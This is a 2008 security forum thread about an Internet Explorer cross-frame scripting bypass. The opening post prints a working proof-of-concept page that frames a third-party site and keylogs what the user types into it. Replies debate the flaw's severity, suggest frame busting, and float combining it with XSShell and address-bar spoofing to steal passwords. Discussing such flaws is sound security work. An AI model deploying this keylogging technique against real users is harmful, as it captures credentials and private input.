Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
If you have some interesting news or want to throw up a link to discuss it, here's the place. Anything is okay, even shameless vendor launches (since that is often applicable to what we work on). 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
IE Cross Frame Scripting Restriction Bypass
Posted by: digi7al64
Date: October 08, 2008 01:32AM

After much debate with a vulnerability assessor in regards to the same domain policy (and the fact I believed it couldn't be bypassed with modern browsers barring an 0 day) I was presented with a link to following script.

<html>
<head>
<title>IE Cross Frame Scripting Restriction Bypass Example</title>
<script>
var keylog='';
document.onkeypress = function () {   
 k = window.event.keyCode;   
 window.status = keylog += String.fromCharCode(k) + '[' + k +']';}
</script>
</head>
<frameset onLoad="this.focus();" onBlur="this.focus();" cols="100%,*">
<frame src="http://www.google.com" scrolling="auto">
</frameset>
</html>

http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=77

As you can see (create a PoC) and type something into the search, it can key log data from a 3rd party domain therefore bypassing the same domain policy. This was found back in 2004 and although MS stated they would address the issue all my tests (across multiple IE's) indicate IE (up to 8) is still vulnerable.

bastards!

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 1 time(s). Last edit at 10/08/2008 06:55PM by digi7al64.

Options: ReplyQuote
Re: IE Cross Frame Scripting Restriction Bypass
Posted by: kuza55
Date: October 09, 2008 07:09PM

Umm, I don't know about you, but I'd throw this in the "don't really care" bucket.

Sure, you can get their keystrokes across-domain, hell there's a more useful variant where after you inject and iframe, you can then keep stealing focus to get keystrokes, however, in the example you posted, it's pretty irrelevant, since if the user can be tricked into entering sensitive data there, they can be tricked into entering sensitive data on a phishing page, in the iframe-injection scenario, you still need ot be able to inject an iframe.

So unless you can think of a viable attack for this, I don't see your point...

A vulnerability isn't really a vulnerability unless someone can exploit it.

----------------------------------------------------------
Don't forget our IRC: irc://irc.irchighway.net/#slackers
[kuza55.blogspot.com]

Options: ReplyQuote
Re: IE Cross Frame Scripting Restriction Bypass
Posted by: Mephisto
Date: October 10, 2008 03:32PM

Implementing "frame busting code" and correct implementation of DIV tags will prevent that issue.

Options: ReplyQuote
Re: IE Cross Frame Scripting Restriction Bypass
Posted by: digi7al64
Date: October 13, 2008 07:16PM

kuza55 Wrote:
-------------------------------------------------------
> Umm, I don't know about you, but I'd throw this in
> the "don't really care" bucket.
>
> Sure, you can get their keystrokes across-domain,
> hell there's a more useful variant where after you
> inject and iframe, you can then keep stealing
> focus to get keystrokes, however, in the example
> you posted, it's pretty irrelevant, since if the
> user can be tricked into entering sensitive data
> there, they can be tricked into entering sensitive
> data on a phishing page, in the iframe-injection
> scenario, you still need ot be able to inject an
> iframe.
>
> So unless you can think of a viable attack for
> this, I don't see your point...
>
> A vulnerability isn't really a vulnerability
> unless someone can exploit it.


I couldn't agree more. The problem is trying to explain this to a customer when the company doing the pen testing are screaming about how dangerous this really is... which in its essence, is an over complicated phishing attack? However, I am wondering why it wouldn't be patched by MS considering it does not conform to the same domain policy restrictions enforced everywhere else.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: IE Cross Frame Scripting Restriction Bypass
Posted by: TheInsider
Date: December 20, 2008 11:03PM

How CAN YOU NOT think about combining this with XSShell and while the user changes websites he is still under the attackers page and the attacker gets his passwords (emails, networking, shopping...).

Of course the huge catch is the addressbar (which displays the first site where the XSS began, but that catch exists for XSShell anyway when the user changes websites)

A combination of this with an address bar spoofing would be flawless :)
If i only had one that i was willing to share :)

http://rafelivgi.blogspot.com
Aspect9 Founder & Chief Security Architect
------------------------------------------
My job is to assess not assassinate
You can spend your life reading what others write or you can spend your life writing for others to read, choose your destiny!

Options: ReplyQuote


Sorry, only registered users may post in this forum.